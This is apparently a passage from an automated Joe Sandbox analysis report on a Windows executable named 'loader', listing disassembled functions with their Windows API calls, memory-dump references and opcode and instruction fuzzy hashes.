                                                                                    • Opcode ID: ef5cdc6d07f4c175adf7e9afcd273c464769d3630e711562c44f771142262c31
                                                                                    • Instruction ID: 042af95aac3476a31421d0b32ca881a67ca3d478d9db64fa0974c9014999b714
                                                                                    • Opcode Fuzzy Hash: ef5cdc6d07f4c175adf7e9afcd273c464769d3630e711562c44f771142262c31
                                                                                    • Instruction Fuzzy Hash: C801AF308107A0DAE725EBB8C051BDDFBE5EF68304F51848DA55753682CFB41B08D7A6
                                                                                    Function 0063A4ED Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,0063A325,00000001,006370E6,?,0063A175,?,00000001,00000000,?,?), ref: 0063A501
                                                                                      • Part of subcall function 0063BB03: _wcslen.LIBCMT ref: 0063BB27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2048169685-0
                                                                                    • Opcode ID: 0372bbf23c2efe84df95a65cea8cb76c206ababc3b8213524b511ac03b8930e1
                                                                                    • Instruction ID: 52442ff83e824d0034f745cf6a10fa54c5a95d46b10a71f9fdf7a0cf78eb2dff
                                                                                    • Opcode Fuzzy Hash: 0372bbf23c2efe84df95a65cea8cb76c206ababc3b8213524b511ac03b8930e1
                                                                                    • Instruction Fuzzy Hash: 84F06D32250219BBDF015FA0DC45FDA376EBF04395F488065F989D62A0DB71DAD8EBA0
                                                                                    Function 0063A1E0 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0063977F,?,?,006395CF,00000000,00662641,000000FF), ref: 0063A1F1
                                                                                      • Part of subcall function 0063BB03: _wcslen.LIBCMT ref: 0063BB27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 3339486230-0
                                                                                    • Opcode ID: 44c6a3b79192c8787b0cc302f02f8a1dc0e67d3aa508b32622c5d74286871161
                                                                                    • Instruction ID: d6727e364f95e8efb7030b0ab484ef6028877fdbee58e184a39611f4ed5b2ded
                                                                                    • Opcode Fuzzy Hash: 44c6a3b79192c8787b0cc302f02f8a1dc0e67d3aa508b32622c5d74286871161
                                                                                    • Instruction Fuzzy Hash: 78E092311502196BDB415F60DC45FDA375EBB08381F484025B945D2150EB61DE88EAA4
                                                                                    Function 0063A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0063A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,0063A592,000000FF,?,?), ref: 0063A6C4
                                                                                      • Part of subcall function 0063A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,0063A592,000000FF,?,?), ref: 0063A6F2
                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0063A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$FileFirst$Close
                                                                                    • String ID:
                                                                                    • API String ID: 2810966245-0
                                                                                    • Opcode ID: 5eb133cd6aaac5748ea965405b7f21bfa8c3c6c1c510a0fc27d619be906734ab
                                                                                    • Instruction ID: cd34048ffe75d0370737baa8eba2b87d769198299fda03dac7389bfb4a62eb3d
                                                                                    • Opcode Fuzzy Hash: 5eb133cd6aaac5748ea965405b7f21bfa8c3c6c1c510a0fc27d619be906734ab
                                                                                    • Instruction Fuzzy Hash: 52F0A73140C790ABCB6257F48905BCB7B926F1A331F048A4DF1FD52196C3755099ABB3
                                                                                    Function 0064F4E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___security_init_cookie.LIBCMT ref: 0064F530
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___security_init_cookie
                                                                                    • String ID:
                                                                                    • API String ID: 3657697845-0
                                                                                    • Opcode ID: 782a6d84ff551b70dd12fd652aaf6a6e882065f31a8d07acc15438d44750f5d9
                                                                                    • Instruction ID: 70796ebacb76a00aec37e8a9ca27eb47ae98711611af60fb44410b2a0c16c97e
                                                                                    • Opcode Fuzzy Hash: 782a6d84ff551b70dd12fd652aaf6a6e882065f31a8d07acc15438d44750f5d9
                                                                                    • Instruction Fuzzy Hash: D7E09A3290824A8ECF25EFD4D8027EDB7B3EB40325F1009B9E911236A28A321944CA59
                                                                                    Function 0064A626 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • 739A6BB0.GDIPLUS(00000010), ref: 0064A62C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                    • Instruction ID: 9d491eea3b8152f14e37985ffbaed65e79d1019c339adcfaad6d8e7ce7ef51ef
                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                    • Instruction Fuzzy Hash: 4DD0C77125020976DF426FA18D1296E7597EB01344F048125B841D5152EAB1D910955A
                                                                                    Function 0064DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0064DD92
                                                                                      • Part of subcall function 0064B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064B579
                                                                                      • Part of subcall function 0064B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B58A
                                                                                      • Part of subcall function 0064B568: IsDialogMessageW.USER32(00010406,?), ref: 0064B59E
                                                                                      • Part of subcall function 0064B568: TranslateMessage.USER32(?), ref: 0064B5AC
                                                                                      • Part of subcall function 0064B568: DispatchMessageW.USER32(?), ref: 0064B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 897784432-0
                                                                                    • Opcode ID: 81698c80cb279af68e0e3cadbb8a062c69143618434970d4011fbbe4abeeea42
                                                                                    • Instruction ID: c7cafd961b09865f5e17cb49705105a5833a2bb6002b223b11bdb138082bcd8c
                                                                                    • Opcode Fuzzy Hash: 81698c80cb279af68e0e3cadbb8a062c69143618434970d4011fbbe4abeeea42
                                                                                    • Instruction Fuzzy Hash: D6D09E31144300BAD7012B51CD06F0B7AE7AB88B08F005959B388740F1C6B29E61DB15
                                                                                    Function 006398BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileType.KERNELBASE(?,006397BE), ref: 006398C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    • Opcode ID: 68b3636f5c44d2cd6b967085f7c7b6bacaf0bf56a22d557ed363fbdcebc4917c
                                                                                    • Instruction ID: 69b3eaed8b0a1d10959d3af05f148f244e43e3baa7aa2c4021c685edced8c851
                                                                                    • Opcode Fuzzy Hash: 68b3636f5c44d2cd6b967085f7c7b6bacaf0bf56a22d557ed363fbdcebc4917c
                                                                                    • Instruction Fuzzy Hash: 55C00234804115958E21562498454D5B713AF93365BB49F95D069852B1C372CC57EE61
                                                                                    Function 00639F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNELBASE(?,0063903E,?,?,-00000870,?,?,?,?,00000000,?,-00000974,?,?,?,?), ref: 00639F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: File
                                                                                    • String ID:
                                                                                    • API String ID: 749574446-0
                                                                                    • Opcode ID: e11eb8d6230db3b40b8751024726175cd2900f7c6a2ea18eefbea3fa3c9d6c49
                                                                                    • Instruction ID: 1e8d859598d1dda7e6d733065b7345dbd839a2ce31932e3d3bbe13cbba0f8ddd
                                                                                    • Opcode Fuzzy Hash: e11eb8d6230db3b40b8751024726175cd2900f7c6a2ea18eefbea3fa3c9d6c49
                                                                                    • Instruction Fuzzy Hash: FCA0113008802A8A8E002B30CA0800C3B22EB20BC830022A8A00ACA0A2CB22880B8B00
                                                                                    Function 0064AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 0064AC08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    • Opcode ID: f810a86a7379052aae55617268adcfdd3e9a063fa2a13e69b9c669bc059f4062
                                                                                    • Instruction ID: f5683e5c96e73af3d3e74a075744add6a7e97a35bcf8ce513c9c20d7e957ce3b
                                                                                    • Opcode Fuzzy Hash: f810a86a7379052aae55617268adcfdd3e9a063fa2a13e69b9c669bc059f4062
                                                                                    • Instruction Fuzzy Hash: 25A011302002208BA3000B328F0AA0EBAAAAFA2B00F00C028A00080230CB30CC20AA00
                                                                                    Function 00639620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,006395D6,00000000,00662641,000000FF), ref: 0063963B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 7c1e44fbd0951943b6d4f48621ebe45eb1a02f0b0cbeeabe792c195a6043adbc
                                                                                    • Instruction ID: a3e54927eaf3feea843842a24a6fd66f73ce1c87d24658a9f47b4b81cb660490
                                                                                    • Opcode Fuzzy Hash: 7c1e44fbd0951943b6d4f48621ebe45eb1a02f0b0cbeeabe792c195a6043adbc
                                                                                    • Instruction Fuzzy Hash: A8F08970482B159FFB308A64C85A7D2B7EA6B13325F045B1ED0E742AE0D7A1698DCE90
                                                                                    Function 0064AC7C Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00662641,000000FF), ref: 0064ACB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Uninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 3861434553-0
                                                                                    • Opcode ID: fc92c6227074a32b9672e076a1affa0b5be6de6dbfec37c5f8d079e1909244d1
                                                                                    • Instruction ID: 3a1cfa23a3f907f40a4a77cdd9328c98e8dd58657e0f007166e598cda104ab5e
                                                                                    • Opcode Fuzzy Hash: fc92c6227074a32b9672e076a1affa0b5be6de6dbfec37c5f8d079e1909244d1
                                                                                    • Instruction Fuzzy Hash: FFE06572544650EFC7009F58DC06B45FBAEFB48B20F00426AF416D3B60CB746D40CA94
                                                                                    Function 0082D598 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0082D5C3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 9f55dcedc4d8ffc018289f8495e68ca906b3d718993c7eccfc65d7d9a398bb67
                                                                                    • Instruction ID: 71c6e3ecd4939d022b00800b0213585057e094263e2ff7cfdbcc729da19fe4cd
                                                                                    • Opcode Fuzzy Hash: 9f55dcedc4d8ffc018289f8495e68ca906b3d718993c7eccfc65d7d9a398bb67
                                                                                    • Instruction Fuzzy Hash: 1EE0ECB5300218ABDB10CE4CEA44B6A37DDF748714F108021FA09D7245C274EC509765

                                                                                    Non-executed Functions

                                                                                    Function 0065D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
